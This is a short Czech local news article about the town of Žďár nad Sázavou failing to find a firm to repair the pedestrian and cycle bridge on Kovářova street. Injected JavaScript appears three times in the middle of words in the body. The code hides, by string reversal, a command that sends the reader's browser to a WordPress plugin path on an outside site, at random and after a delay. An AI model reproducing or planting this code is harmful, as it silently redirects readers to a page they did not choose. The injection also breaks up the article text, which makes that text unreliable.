Rainbow page separator

Na obnovu mostu v Kovářově ulici se zatím nedaří najít firmu

Středa, 4. května 2022

Žďár nad Sázavou / Firmu, která provede rekonstrukci mostu v ulici Kovářova, se zatím nepodařilo najít žďárské radnici. „Stavební trh přišel o řadu ukrajinských dělníků a nejsou zájemci o zakázku na opravu mostu Kovářova,“ poznamenal starosta Žďáru nad Sázavou Martin Mrkos.
Převážně železobe[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tonový most má projít odstraněním původního svršku a jeho nahrazení novým s tím, že ponechané konstrukce budou sanovány. I nadále má přemostění sloužit pouze pro pěší a cyklisty. Zakázka byla předběžně vyčíslena na 4,6 milionu korun.
U mostu na sebe taktéž navazují části frekven[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tované cyklostezky spojující střed Žďáru se zámkem a Pilskou nádrží. I ta v posledních letech prochází po etapách obnovou. Le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos je v plánu úsek od ‚závodiště u Kinských‘ až po statek Lyra, kde stezka ústí do ulice Dvorská.